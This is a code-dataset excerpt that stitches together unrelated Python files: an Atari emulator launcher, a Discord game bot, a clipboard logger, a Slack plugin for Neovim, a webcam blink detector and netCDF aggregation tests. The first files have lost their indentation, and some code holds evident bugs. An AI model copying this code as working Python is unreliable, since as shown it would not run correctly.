new_generic_cart = GenericCartridge(sys.argv[1], 4, 0x1000, 0xFF9, 0x0)
print(new_generic_cart.read(0), new_generic_cart.read(1))
new_pb_cart = PBCartridge(sys.argv[1])
print(new_pb_cart.read(0), new_pb_cart.read(1))
```
#### File: emulator/pytari2600/profile.py
```python
import cProfile
import pytari2600
import argparse
import pstats
class Args(object):
def __init__(self):
pass
parser = argparse.ArgumentParser(description='Profile emulator')
parser.add_argument('-r', dest='rerun', action='store_true', default=False)
parser.add_argument('-t', dest='tottime', action='store_true', default=False)
parser.add_argument('-c', dest='cumulative', action='store_true', default=False)
cmd_args = parser.parse_args()
if cmd_args.rerun:
pytari_args = Args()
pytari_args.cart_type='default'
# pytari_args.cart_type='single_bank'
pytari_args.cartridge_name='../atari2600/roms/Pitfall!.bin'
pytari_args.debug=False
pytari_args.no_delay=False
pytari_args.stop_clock=4000000
pytari_args.replay_file=None
pytari_args.graphics_driver='pygame'
pytari_args.audio_driver='tia_dummy'
pytari_args.cpu_driver='cpu_gen'
cProfile.run('pytari2600.run(pytari_args)','profile.stats')
p = pstats.Stats('profile.stats')
if cmd_args.cumulative:
p.sort_stats('cumulative').print_stats()
if cmd_args.tottime:
p.sort_stats('tottime').print_stats()
```
#### File: emulator/pytari2600/pytari2600.py
```python
import argparse
from . import atari2600
from .audio.tiasound import TIA_Sound as AudioDriver
from .graphics.pygamestella import PygameStella as Graphics
from . import cpu_gen as cpu
def config(graphics_selection, audio_selection, cpu_selection):
# Use some questionable code to perform driver selection.
# Imports only occur 'on-demand' so missing dependencies cause issues
# unless you attempt to use them.
exec_locals= {}
exec(audio_options[audio_selection], {}, exec_locals)
exec(graphics_options[graphics_selection], {}, exec_locals)
exec(cpu_options[cpu_selection], {}, exec_locals)
return (exec_locals['Graphics'],
exec_locals['AudioDriver'],
exec_locals['cpu'])
def new_atari(cartridge, cart_type="default", headless=False):
atari = atari2600.Atari(Graphics, AudioDriver, cpu, headless)
atari.insert_cartridge(cartridge, cart_type)
atari.prepare()
return atari
def run(args):
atari = atari2600.Atari(Graphics, AudioDriver, cpu)
atari.insert_cartridge(args.cartridge_name, args.cart_type)
atari.power_on(args.stop_clock, args.no_delay, args.debug, args.replay_file)
def main():
parser = argparse.ArgumentParser(description='ATARI emulator')
parser.add_argument('cartridge_name', action='store')
parser.add_argument('-d', dest='debug', action='store_true')
parser.add_argument('-r', '--replay_file', dest='replay_file', type=str,
help="Json file to save/restore state. Triggered via '[',']' keys")
parser.add_argument('-s', dest='stop_clock', type=int, default=0,
help="Set a clock time to stop (useful for profiling), setting to '0' is disable stop")
parser.add_argument('-c', dest='cart_type',
choices=['default', 'pb', 'mnet', 'cbs',
'e', 'fe','super','f4', 'single_bank'],
default='default',
help="Select the cartridge type of the rom being run (default is for 'common' bankswitching)")
parser.add_argument('-g', dest='graphics_driver',
choices=graphics_options.keys(),
default='pygame',
help="Select an alternate to graphics module")
parser.add_argument('--cpu', dest='cpu_driver',
choices=cpu_options.keys(),
default='cpu_gen',
help="Select an alternate CPU emulation, primarily to allow trying different optimisations.")
parser.add_argument('-a', dest='audio_driver',
choices=audio_options.keys(),
default='tia_dummy',
help="Select an alternate CPU emulation, primarily to allow trying different optimisations.")
parser.add_argument('-n', dest='no_delay', action='store_true',
help="Wishful flag for when the emulator runs too fast.")
args = parser.parse_args()
print(args)
run(args)
if __name__=='__main__':
main()
```
#### File: modules/games/cog.py
```python
from typing import Union
# from .chess import *
# from .connectfour import *
# from .hangman import *
# from .quiz import *
# from .tictactoe import *
from .uno import *
from .util.game import *
class Games(commands.Cog):
def __init__(self, bot):
self.bot = bot
self.games = {}
@commands.command(name="uno")
async def uno(self, ctx):
if ctx.channel in self.games:
await ctx.send("There is already an UNO game in this channel.")
else:
game = Uno(ctx.channel, [ctx.author])
self.games[ctx.channel] = game
await game.init()
def setup(bot):
bot.add_cog(Games(bot))
```
#### File: modules/games/mafia.py
```python
import asyncio
import math
import random
from modules.games.util.game import Game
ROLE_MAFIA = 0
ROLE_DOCTOR = 1
ROLE_DETECTIVE = 2
ROLE_CITIZEN = 3
async def prompt_user(bot, user, text, callback, message_check=None):
dm = await user.create_dm()
prompt = await dm.send(text)
if message_check is None:
def message_check(m):
return m.author == user
try:
msg = await bot.wait_for("message", check=message_check, timeout=30.0)
await callback(prompt, msg)
except asyncio.TimeoutError:
await dm.send("Took too long.")
return
async def prompt_mafia(bot, user, text, callback):
def message_check(m):
return m.author == user and m.content.isnumeric()
await prompt_user(bot, user, text, callback, message_check)
class Mafia(Game):
min_players = 4
max_players = 10
name = "Mafia"
def __init__(self, handler, channel, players):
super().__init__(handler, channel, players)
self.roles = {}
self.day = 1
def get_display(self):
return str(self.players)
async def start(self):
await super().start()
mafia_count = math.floor(len(self.players)/3)
doctor_count = 1
detective_count = 1
citizen_count = len(self.players) - mafia_count - doctor_count - detective_count
roles = [ROLE_MAFIA] * mafia_count + [ROLE_DOCTOR] * doctor_count \
+ [ROLE_DETECTIVE] * detective_count + [ROLE_CITIZEN] * citizen_count
random.shuffle(roles)
self.roles = {player: 0 for player in self.players}
for i in range(len(self.players)):
self.roles[self.players[i]] = roles[i]
await self.send(self.roles)
async def night(self):
to_kill = []
async def mafia_callback(prompt, msg):
pass
async def doctor_callback(prompt, msg):
pass
async def detective_callback(prompt, msg):
pass
for player in self.players:
if self.roles[player] == ROLE_MAFIA:
await prompt_mafia(self.handler.bot, player, "Choose a player to kill:", mafia_callback)
elif self.roles[player] == ROLE_DOCTOR:
await prompt_mafia(self.handler.bot, player, "Choose a player to save:", doctor_callback)
elif self.roles[player] == ROLE_DETECTIVE:
await prompt_mafia(self.handler.bot, player, "Choose a player to investigate:", detective_callback)
async def on_message(self, message):
pass
async def display(self):
await self.send(self.get_display())
async def end(self):
await super().end()
sorted_scores = sorted(self.points.items(), key=lambda kv: kv[1])
if max(self.lives.values()) <= 0:
await self.send(f"The creator of the game ({self.owner.mention}) won as nobody guessed the phrase.")
else:
self.winner = sorted_scores[0][0]
# self.handler.add_tokens(self.channel.guild, self.winner.id, 10)
await self.send(f"Winner: {self.winner.mention} ({sorted_scores[0][1]} points).")
```
#### File: modules/games/tictactoe.py
```python
from modules.games.util.game import TurnBasedGame, Rules, DEFAULT_GAME_TOKENS
TTT_TILES = [["🇦", "🇧", "🇨"],
["🇩", "🇪", "🇫"],
["🇬", "🇭", "🇮"]]
class TicTacToeRules(Rules):
keys = ["scuffed"]
def __init__(self):
super().__init__()
self._scuffed = False
@property
def scuffed(self):
return self._scuffed
@scuffed.setter
def scuffed(self, value):
if value not in ["true", "false"]:
raise ValueError("Invalid value (must be true or false)")
self._scuffed = value == "true"
class TicTacToe(TurnBasedGame):
min_players = 2
max_players = 2
name = "Tic-Tac-Toe"
def __init__(self, handler, channel, players):
super().__init__(handler, channel, players)
self.rules = TicTacToeRules()
self.board = list()
self.player_icons = DEFAULT_GAME_TOKENS
async def start(self):
self.board = [[0 for _ in range(3)] for _ in range(3)]
self.player_icons = [self.handler.bot.user_config.get(self.players[i].id, "game-emote") or self.player_icons[i]
for i in range(len(self.players))]
await super().start()
await self.display()
def check_win(self):
a, b, c = self.board[0]
d, e, f = self.board[1]
g, h, i = self.board[2]
win_conditions = [(a, b, c), (d, e, f), (g, h, i), (a, d, g),
(b, e, h), (c, f, i), (a, e, i), (c, e, g)]
for condition in win_conditions:
if condition[0] != 0 and len(set(condition)) == 1:
return condition[0]
return 0
def get_board(self):
msg = str()
for y in range(3):
for x in range(3):
cell = self.board[y][x]
if cell == 0:
msg += TTT_TILES[y][x]
elif cell == 1:
msg += self.player_icons[0]
elif cell == 2:
msg += self.player_icons[1]
msg += "\u200b"
msg += "\n"
return msg
def get_key(self):
return f"{self.player_icons[0]} **{self.players[0].name}** {self.player_icons[1]} **{self.players[1].name}**"
def get_display(self):
return f"It is currently **{self.get_turn().name}'s** turn.\n" + self.get_board() + "\n" + self.get_key()
async def display(self):
await self.send(self.get_display())
async def play_token(self, player, x, y):
await self.reset_timeout()
if self.board[y][x] != 0:
return
self.board[y][x] = self.turn + 1
win = self.check_win()
if win > 0:
self.winner = self.players[win-1]
await self.end()
return
if not any(0 in row for row in self.board):
await self.end()
return
self.turn += 1
self.turn %= len(self.players)
await self.send(f"**{player.name}** played a token in position {'ABCDEFGHI'[3*y+x]}.\n"
f"It is now **" + self.get_turn().name + "'s** turn.\n\n"
+ self.get_board() + "\n" + self.get_key())
async def on_message(self, message):
if message.author not in self.players:
return
if message.author != self.get_turn() and not self.rules.scuffed:
return
move = message.content.lower()
if move not in "abcdefghi":
return
i = "abcdefghi".index(move)
move_x, move_y = i % 3, i // 3
await self.play_token(message.author, move_x, move_y)
async def end(self):
await super().end()
if self.winner is None:
await self.send("There was a tie and nobody received points.\n\n" + self.get_board())
else:
# self.handler.add_tokens(self.channel.guild, self.winner.id, 5)
await self.send(f"Winner: **{self.winner.name}**\n\n" + self.get_board())
```
#### File: games/util/game.py
```python
from typing import Union
import discord
from discord.ext import commands
DEFAULT_GAME_TOKENS = ["\N{LARGE RED CIRCLE}",
"\N{LARGE BLUE CIRCLE}",
chr(0x1f7e2),
chr(0x1f7e1),
"\N{RADIO BUTTON}"]
class GameCheckFailure(commands.CheckFailure):
def __init__(self, gametype, message=None):
super().__init__(message)
self.gametype = gametype
class Rules:
keys = []
def __init__(self):
pass
class LobbyView(discord.ui.View):
def __init__(self, game, *args, **kwargs):
super().__init__(*args, **kwargs)
self.game = game
@discord.ui.button(label="Join/Leave", style=discord.ButtonStyle.red)
async def joinleave(self, button, interaction):
player = interaction.user
if player in self.game.players:
await self.game.remove_player(player)
else:
await self.game.add_player(player)
self.game.embed.description = "\n".join(str(player) for player in self.game.players)
await self.game.update_message()
@discord.ui.button(label="Start", style=discord.ButtonStyle.green)
async def start(self, button, interaction):
if interaction.user != self.game.owner:
return
await self.game.start()
class Game:
min_players = 1
max_players = 5
timeout_time = 600
# timeout_time_lobby = 1200
name = "Null"
def __init__(self, channel, players):
self.rules = Rules()
self.channel = channel
self.players = players
self.owner = players[0]
self.winner = None
self.playing = False
self.message = None
self.embed = None
self.view = LobbyView(self)
async def init(self):
self.embed = discord.Embed(title=f"{self.name} Game")
self.message = await self.channel.send(embed=self.embed, view=self.view)
async def remove_player(self, player):
if player not in self.players:
return
self.players.remove(player)
if len(self.players) == 0:
pass
# remove game
elif len(self.players) == 1 and self.playing:
self.winner = self.players[0]
await self.end()
else:
if player == self.owner:
self.owner = self.players[0]
await self.update_message()
async def add_player(self, player):
if player in self.players:
return
self.players.append(player)
async def start(self):
self.playing = True
async def on_message(self, message):
pass
async def end(self):
self.handler.remove_game(self)
async def update_message(self):
await self.message.edit(embed=self.embed, view=self.view)
class TurnBasedGame(Game):
min_players = 2
max_players = 5
def __init__(self, channel, players):
super().__init__(channel, players)
self.turn = 0
self.is_reversed = False
def next_turn(self):
if self.is_reversed:
self.turn -= 1
else:
self.turn += 1
self.turn %= len(self.players)
def get_turn(self, offset=0):
turn = (self.turn + offset * (-1 if self.is_reversed else 1)) % len(self.players)
return self.players[turn]
"""
async def play(self, message):
await super().play(message)
if message.author != self.players[self.turn]:
return
self.turn += 1
self.turn %= len(self.players)
await self.on_turn(self.players[self.turn])
"""
async def on_turn(self, player):
await self.channel.send(f"It is now **{player.name}'s** turn.")
class RoundBasedGame(Game):
def __init__(self, channel, players):
super().__init__(channel, players)
self.round = 0
self.players_done = []
async def check_round_end(self):
if len(self.players_done) == len(self.players):
self.players_done = []
self.round += 1
await self.on_round()
async def remove_player(self, player):
await super().remove_player(player)
if player in self.players_done:
self.players_done.remove(player)
async def on_player_finish(self, player):
if player not in self.players_done:
self.players_done.append(player)
await self.check_round_end()
async def on_round(self):
pass
``` |
{
"source": "5StevenWu/capacityAnalyse",
"score": 3
} |
#### File: capacityAnalyse/clipfolder/comexam2.py
```python
import pyperclip
import time
# 稳定不出错
class niubi():
def lihai(self):
while True:
# jianting().main()
t = jianting().main()
print(t)
with open('clip25.txt', 'a', encoding='utf-8') as file_obj:
file_obj.write(t)
file_obj.write('\n')
class jianting():
def clipboard_get(self):
"""获取剪贴板数据"""
data = pyperclip.paste() # 主要这里差别
return data
def main(self):
"""后台脚本:每隔0.2秒,读取剪切板文本,检查有无指定字符或字符串,如果有则执行替换"""
# recent_txt 存放最近一次剪切板文本,初始化值只多执行一次paste函数读取和替换
recent_txt = self.clipboard_get()
while True:
# txt 存放当前剪切板文本
txt = self.clipboard_get()
# 剪切板内容和上一次对比如有变动,再进行内容判断,判断后如果发现有指定字符在其中的话,再执行替换
if txt != recent_txt:
# print(f'txt:{txt}')
recent_txt = txt # 没查到要替换的子串,返回None
return recent_txt
# 检测间隔(延迟0.2秒)
time.sleep(0.02)
if __name__ == '__main__':
niubi().lihai()
```
#### File: capacityAnalyse/kanban/data7.py
```python
from datetime import datetime, timedelta
def day7(rightday):
lastsunday = (rightday + timedelta(days=-8)).strftime("%Y-%m-%d")
monday = (rightday + timedelta(days=-7)).strftime("%Y-%m-%d")
tuesday = (rightday + timedelta(days=-6)).strftime("%Y-%m-%d")
wednesday = (rightday + timedelta(days=-5)).strftime("%Y-%m-%d")
thursday = (rightday + timedelta(days=-4)).strftime("%Y-%m-%d")
friday = (rightday + timedelta(days=-3)).strftime("%Y-%m-%d")
saturday = (rightday + timedelta(days=-2)).strftime("%Y-%m-%d")
sunday = (rightday + timedelta(days=-1)).strftime("%Y-%m-%d")
week = [lastsunday, monday, tuesday, wednesday, thursday, friday, saturday, sunday]
print(week)
return week
``` |
{
"source": "5StevenWu/wemonitor",
"score": 2
} |
#### File: sendmail/flaskmail110/monitor.py
```python
from flask import Flask, request
import requests
import re
from send2alimail import sendmail
import time
app = Flask(__name__)
@app.route('/')
def index():
return 'mail110'
@app.route('/mail')
def mail():
return '发送邮件报警'
def passimsa():
response = requests.get('http://www.imsa.cn')
# response = requests.get('http://cca.imsa.cn')
pagetext = response.text
title = '中国国际象棋协会综合服务管理平台'
res = re.search(title, pagetext)
if res:
requests.get('127.0.0.1:5000',)
if __name__ == '__main__':
# app.run(debug=True)
while True:
passimsa()
time.sleep(300)
```
#### File: sendmail/flaskmail110/read_config.py
```python
import os
import json
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
def loadConf():
with open('wechatConf.zqconfig', 'r') as wechatConf:
settings = json.load(wechatConf)
# corpid = settings['corpid']
# corpsecret = settings['corpsecret']
passwd=settings["passwd"]
return passwd
if __name__ == '__main__':
test = loadConf()
print(test)
``` |
{
"source": "5t111111/slack-post.nvim",
"score": 3
} |
#### File: rplugin/python3/slack_post.py
```python
import neovim
from slackclient import SlackClient
@neovim.plugin
class SlackPost(object):
"""
the following global var should be set in Neovim configuration
- g:slack_api_token : slack api token
- g:slack_channel_to_post : slack channel you want to post to
- g:slack_username : slack username (optional)
- g:slack_icon_emoji : slack emoji for icon (optional)
"""
def __init__(self, nvim):
self.nvim = nvim
self.text = None
@neovim.command("PostTextToSlack", range='')
def post_text_to_slack(self, range):
b = self.nvim.current.buffer
lines = b[(range[0]-1):range[1]]
self.text = "\n".join(lines)
return self.__execute_posting()
@neovim.command("PostCodeToSlack", range='')
def post_code_to_slack(self, range):
b = self.nvim.current.buffer
lines = b[(range[0]-1):range[1]]
lines.insert(0, '```')
lines.append('```')
self.text = "\n".join(lines)
return self.__execute_posting()
def __execute_posting(self):
token = self.__get_vim_global_var_safely('slack_api_token')
if token is None:
return False
channel = self.__get_vim_global_var_safely('slack_channel_to_post')
if channel is None:
return False
username = self.__get_vim_global_var_safely('slack_username')
if username is None:
username = 'Nvim Bot'
icon_emoji = self.__get_vim_global_var_safely('slack_icon_emoji')
if icon_emoji is None:
icon_emoji = ':robot_face:'
self.nvim.command(':let choice = confirm("Are you sure you want to post the selected lines to Slack?", "y Yes\nn No\n")')
answer = self.nvim.eval('choice')
if answer == 1:
sc = SlackClient(token)
sc.api_call(
'chat.postMessage',
channel=channel,
text=self.text,
username=username,
icon_emoji=icon_emoji
)
self.nvim.command('echo "Posted!"')
return True
else:
self.nvim.command('echo "Canceled"')
return False
def __get_vim_global_var_safely(self, var_name):
self.nvim.command(':let g:{var_name!s} = get(g:, "{var_name!s}", "")'.format(**locals()))
value = self.nvim.eval('g:{var_name!s}'.format(**locals()))
if not value:
self.nvim.err_write("g:{var_name!s} is not set\n".format(**locals()))
return None
return value
``` |
{
"source": "5tarlight/ai-blink",
"score": 3
} |
#### File: 5tarlight/ai-blink/blink.py
```python
import cv2
import dlib
import math
import time
import webbrowser
import os
# import playsound from playsound
BLINK_RATIO_THRESHOLD = 5.7
#-----Step 5: Getting to know blink ratio
def midpoint(point1 ,point2):
return (point1.x + point2.x)/2,(point1.y + point2.y)/2
def euclidean_distance(point1 , point2):
return math.sqrt((point1[0] - point2[0])**2 + (point1[1] - point2[1])**2)
def get_blink_ratio(eye_points, facial_landmarks):
#loading all the required points
corner_left = (facial_landmarks.part(eye_points[0]).x,
facial_landmarks.part(eye_points[0]).y)
corner_right = (facial_landmarks.part(eye_points[3]).x,
facial_landmarks.part(eye_points[3]).y)
center_top = midpoint(facial_landmarks.part(eye_points[1]),
facial_landmarks.part(eye_points[2]))
center_bottom = midpoint(facial_landmarks.part(eye_points[5]),
facial_landmarks.part(eye_points[4]))
#calculating distance
horizontal_length = euclidean_distance(corner_left,corner_right)
vertical_length = euclidean_distance(center_top,center_bottom)
ratio = 0
if horizontal_length == 0:
ratio = 1
else:
ratio = horizontal_length / vertical_length
return ratio
#livestream from the webcam
cap = cv2.VideoCapture(0)
'''in case of a video
cap = cv2.VideoCapture("__path_of_the_video__")'''
#name of the display window in openCV
cv2.namedWindow('BlinkDetector')
#-----Step 3: Face detection with dlib-----
detector = dlib.get_frontal_face_detector()
#-----Step 4: Detecting Eyes using landmarks in dlib-----
predictor = dlib.shape_predictor("shape_predictor_68_face_landmarks.dat")
#these landmarks are based on the image above
left_eye_landmarks = [36, 37, 38, 39, 40, 41]
right_eye_landmarks = [42, 43, 44, 45, 46, 47]
duration = 0
blink = 0
while True:
start = time.time()
#capturing frame
retval, frame = cap.read()
#exit the application if frame not found
if not retval:
print("Can't receive frame (stream end?). Exiting ...")
break
#-----Step 2: converting image to grayscale-----
frame = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)
#-----Step 3: Face detection with dlib-----
#detecting faces in the frame
faces,_,_ = detector.run(image = frame, upsample_num_times = 0, adjust_threshold = 0.0)
faceCount = len(faces)
#-----Step 4: Detecting Eyes using landmarks in dlib-----
for face in faces:
landmarks = predictor(frame, face)
#-----Step 5: Calculating blink ratio for one eye-----
left_eye_ratio = get_blink_ratio(left_eye_landmarks, landmarks)
right_eye_ratio = get_blink_ratio(right_eye_landmarks, landmarks)
blink_ratio = (left_eye_ratio + right_eye_ratio) / 2
if blink_ratio > BLINK_RATIO_THRESHOLD:
#Blink detected! Do Something!
cv2.putText(frame,"BLINKING",(10,50), cv2.FONT_HERSHEY_SIMPLEX,
2,(255,255,255),2,cv2.LINE_AA)
print('blink!')
blink += duration
else:
if blink > 0:
blink -= duration
else:
blink = 0
duration = (time.time() - start)
print(faceCount, duration, blink)
if blink >= 2:
print('Sleeping!!!!')
cv2.putText(frame,"SLEEPING",(10,120), cv2.FONT_HERSHEY_SIMPLEX,
2,(255,255,255),2,cv2.LINE_AA)
print('\a')
blink = 0
# webbrowser.open('file://{}/index.html'.format(os.path.abspath(os.getcwd())))
# time.sleep(1)
cv2.imshow('BlinkDetector', frame)
key = cv2.waitKey(1)
if key == 27:
break
#releasing the VideoCapture object
cap.release()
cv2.destroyAllWindows()
``` |
{
"source": "5tefan/ncagg",
"score": 2
} |
#### File: exis/EXISL1bSFEU_remapping/type1_test.py
```python
import unittest
import tempfile
import netCDF4 as nc
from ncagg.config import Config
from ncagg.aggregator import generate_aggregation_list, evaluate_aggregation_list
from datetime import datetime
import glob
import os
import numpy as np
import json
class TestEuvs(unittest.TestCase):
def setUp(self):
# tmp file to aggregate to
_, self.nc_out_filename = tempfile.mkstemp()
pwd = os.path.dirname(__file__)
self.files = sorted(glob.glob(os.path.join(pwd, "data", "type1", "*.nc")))
with open(os.path.join(pwd, "type1_config.json")) as config_in:
self.config = Config.from_dict(json.load(config_in))
def tearDown(self):
os.remove(self.nc_out_filename)
def test_basic(self):
""" Ok, so the files in data/type1/ don't have an unlimited dimension, report_number should be
unlimited so I've made report_nubmer unlimited in the config template type1_config.json.
Let's see if we can aggregate to it. """
aggregation_list = generate_aggregation_list(self.config, self.files)
self.assertEqual(len(aggregation_list), 3)
evaluate_aggregation_list(self.config, aggregation_list, self.nc_out_filename)
with nc.Dataset(self.nc_out_filename) as nc_out: # type: nc.Dataset
time = nc_out.variables["time"][:]
self.assertEqual(len(time), 3)
self.assertTrue(nc_out.dimensions["report_number"].isunlimited())
# perffffect
```
#### File: test/generic/test_attribute_strategies.py
```python
import unittest
from datetime import datetime
import tempfile
import netCDF4 as nc
import os
from ncagg.attributes import (
StratFirst,
StratLast,
StratUniqueList,
StratIntSum,
StratFloatSum,
StratAssertConst,
)
from ncagg.attributes import (
StratDateCreated,
StratStatic,
StratTimeCoverageStart,
StratTimeCoverageEnd,
)
from ncagg.attributes import (
StartFirstInputFilename,
StartLastInputFilename,
StratCountInputFiles,
)
from ncagg import Config
from ncagg.attributes import datetime_format
test_dir = os.path.dirname(os.path.realpath(__file__))
test_input_file = os.path.join(
test_dir,
"data/OR_MAG-L1b-GEOF_G16_s20170431500000_e20170431500599_c20170431501005.nc",
)
class TestAttributeStrategies(unittest.TestCase):
def setUp(self):
# having two seconds is on purpose to test the unique list
self.mock_str_attributes = ["first", "second", "second", "third"]
self.mock_int_attributes = [1, 2, 2, 3]
self.mock_float_attributes = [1.1, 2.2, 2.3, 3.3]
self.test_nc = nc.Dataset(test_input_file)
self.handler_kwargs = {"config": Config.from_nc(test_input_file)}
def test_strat_first_gives_first(self):
process, finalize = StratFirst.setup_handler(**self.handler_kwargs)
for attr in self.mock_str_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), "first")
def test_strat_last_gives_last(self):
process, finalize = StratLast.setup_handler(**self.handler_kwargs)
for attr in self.mock_str_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), "third")
def test_strat_unique_list(self):
process, finalize = StratUniqueList.setup_handler(**self.handler_kwargs)
for attr in self.mock_str_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), "first, second, third")
def test_int_sum(self):
process, finalize = StratIntSum.setup_handler(**self.handler_kwargs)
for attr in self.mock_int_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), sum(self.mock_int_attributes))
def test_float_sum(self):
process, finalize = StratFloatSum.setup_handler(**self.handler_kwargs)
for attr in self.mock_float_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), sum(self.mock_float_attributes))
def test_assert_const_fails_nonconst(self):
process, finalize = StratAssertConst.setup_handler(**self.handler_kwargs)
with self.assertRaises(AssertionError):
for attr in self.mock_str_attributes:
process(attr)
self.assertEqual(finalize(self.test_nc), "first")
def test_assert_const_pass_consts(self):
process, finalize = StratAssertConst.setup_handler(**self.handler_kwargs)
for attr in ["const", "const", "const"]:
process(attr)
self.assertEqual(finalize(self.test_nc), "const")
def test_date_created_close(self):
process, finalize = StratDateCreated.setup_handler(**self.handler_kwargs)
for attr in self.mock_str_attributes:
process(attr)
# since both of these date time strings may not be created exactly at the same time,
# only check to make sure they are mostly the same, it's ok if there is some difference
# in the last milliseconds piece.
self.assertEqual(
finalize(self.test_nc)[:-3], datetime_format(datetime.now())[:-3]
)
def test_strat_first_filename(self):
process, finalize = StartFirstInputFilename.setup_handler(**self.handler_kwargs)
process("test", self.test_nc)
self.assertIn(".nc", finalize(self.test_nc))
def test_strat_static(self):
# set the config for a static "license" attribute...
value = "Hello world"
self.handler_kwargs["config"].attrs["license"] = {
"name": "license",
"strategy": "static",
"value": value,
}
process, finalize = StratStatic.setup_handler(
name="license", **self.handler_kwargs
)
process("test", self.test_nc)
self.assertEqual(value, finalize(self.test_nc))
```
#### File: test/generic/test_config_objects.py
```python
import unittest
from ncagg.config import ConfigDict
from ncagg.config import DimensionConfig, VariableConfig, GlobalAttributeConfig
from ncagg.config import Config
class SampleConfig(ConfigDict):
""" A very basic config that expect fields with a something float value,
in order to test that basic functionality works as expected. """
def get_item_schema(self):
default = super(SampleConfig, self).get_item_schema()
default.update({"something": {"type": "float"}})
return default
class TestConfigDict(unittest.TestCase):
def test_init_valid(self):
""" Make sure that a valid configuration is accepted and ordering
preserved. """
a = SampleConfig(
[
{"name": "a", "something": 1},
{"name": "b", "something": 2},
{"name": "z", "something": 1},
]
)
for i, k in enumerate(a.keys()):
# check ordering
self.assertEqual(["a", "b", "z"][i], k)
def test_init_invalid(self):
""" Ensure that the sample config rejects the bad string value
since something is expected to be a float value. """
with self.assertRaises(ValueError):
SampleConfig(
[
{"name": "a", "something": 1},
{"name": "b", "something": "noooo"},
{"name": "z", "something": 1},
]
)
def test_update(self):
""" Test that we can't insert invalid values through update either. """
a = SampleConfig([{"name": "a", "something": 1}, {"name": "z", "something": 1}])
a.update({"b": {"something": 2}})
self.assertEqual(len(a), 3)
with self.assertRaises(ValueError):
a.update({"b": {"something": "noooo"}})
class TestDimVarAttrConfigs(unittest.TestCase):
def test_dimension_config(self):
""" Test that the DimensionConfig object behaves as expected. """
dc = DimensionConfig([{"name": "a", "size": 5}])
self.assertIn("a", dc.keys())
self.assertEqual(dc["a"]["size"], 5)
self.assertTrue(dc["a"]["index_by"] is None)
dc["b"] = {"size": None, "index_by": "c"}
self.assertIn("b", dc.keys())
self.assertTrue(dc["b"]["size"] is None)
self.assertEqual(dc["b"]["index_by"], "c")
# TODO: test Vars, and GlobalAttrs
class TestOverallConfig(unittest.TestCase):
def test_basic(self):
""" Make sure the configuration accepts a valid configuration. """
dims = DimensionConfig([{"name": "a", "size": 2}, {"name": "b", "size": None}])
vars = VariableConfig(
[
{"name": "t", "dimensions": ["b"], "datatype": "float32"},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
Config(dims, vars, attrs)
def test_basic_with_var_attrs(self):
""" Make sure the configuration accepts a valid configuration. """
dims = DimensionConfig([{"name": "a", "size": 2}, {"name": "b", "size": None}])
vars = VariableConfig(
[
{
"name": "t",
"dimensions": ["b"],
"datatype": "float32",
"attributes": {"_FillValue": 0},
},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
Config(dims, vars, attrs)
def test_missing_dim(self):
""" The variable t depends on a dimension c that has not been configured.
Make sure a ValueError is raised because of this."""
dims = DimensionConfig([{"name": "a", "size": 2}, {"name": "b", "size": None}])
vars = VariableConfig(
[
{"name": "t", "dimensions": ["c"], "datatype": "float32"},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
with self.assertRaises(ValueError):
Config(dims, vars, attrs)
def test_extra_dim(self):
"""We have configured an extra dimension z that isn't used by any variables.
Make sure a ValueError is raised. """
dims = DimensionConfig(
[
{"name": "a", "size": 2},
{"name": "b", "size": None},
{"name": "z", "size": None},
]
)
vars = VariableConfig(
[
{"name": "t", "dimensions": ["a"], "datatype": "float32"},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
with self.assertRaises(ValueError):
Config(dims, vars, attrs)
def test_to_json(self):
dims = DimensionConfig([{"name": "a", "size": 2}, {"name": "b", "size": None}])
vars = VariableConfig(
[
{"name": "t", "dimensions": ["b"], "datatype": "float32"},
{"name": "x", "dimensions": ["b", "a"], "datatype": "float32"},
]
)
attrs = GlobalAttributeConfig([])
json = Config(dims, vars, attrs).to_dict()
```
#### File: test/generic/test_multi_unlim_dims.py
```python
import unittest
import numpy as np
import netCDF4 as nc
from ncagg.config import Config
from ncagg.aggregator import generate_aggregation_list, evaluate_aggregation_list
import os
import tempfile
class TestMultiUnlimDims(unittest.TestCase):
def setUp(self):
np.random.seed(
2
) # don't want test results to potentially change based on random
_, self.filename = tempfile.mkstemp()
# since files sorted by name with no UDC, prefix tmp file so ordering
# will be deterministic
self.inputs = [tempfile.mkstemp(prefix=str(_))[1] for _ in range(3)]
for i, inp in enumerate(self.inputs):
with nc.Dataset(inp, "w") as nc_in: # type: nc.Dataset
nc_in.createDimension("a", None)
nc_in.createDimension("b", None)
nc_in.createVariable("a", np.int32, ("a",))
nc_in.createVariable("b", str, ("b",))
nc_in.createVariable("c", np.int32, ("a", "b"))
# the variable a just [0, 1, 2] * i * 3 such that when aggregated,
# we can verify that in the dimension "a", the aggregated variable a
# contains a = 0, 1, 2 ... (3*3)
nc_in.variables["a"][:] = np.arange(3) + (i * 3)
# recall i is the ith input file we're creating...
# then variable b has i elements, being some random selection of "a", "b", and "c"
# I.e. the first file has only one element, next has two, etc. impl by the [:i+1]
# the variable c also has i _columns_.
# for j, b in enumerate(sorted(["a", "b", "c"], key=lambda x: np.random.rand())[:i+1]):
# actually, since we don't have the flatten with index_by working yet,
# instead keep in order...
for j, b in enumerate(["a", "b", "c"][: i + 1]):
nc_in.variables["b"][j] = b
nc_in.variables["c"][:, j] = np.arange(3) + (i * 3)
def tearDown(self):
os.remove(self.filename)
[os.remove(f) for f in self.inputs]
def test_default_multi_dim(self):
config = Config.from_nc(self.inputs[0])
l = generate_aggregation_list(config, self.inputs)
evaluate_aggregation_list(config, l, self.filename)
with nc.Dataset(self.filename) as nc_out: # type: nc.Dataset
# this is the default aggregation produced by aggregation
# along both unlimited dimensions. This isn't really practically
# useful, but, by our "basic" definition of aggregation along unlitimed
# dimensions is correct. Need to make sure we get what's expected.
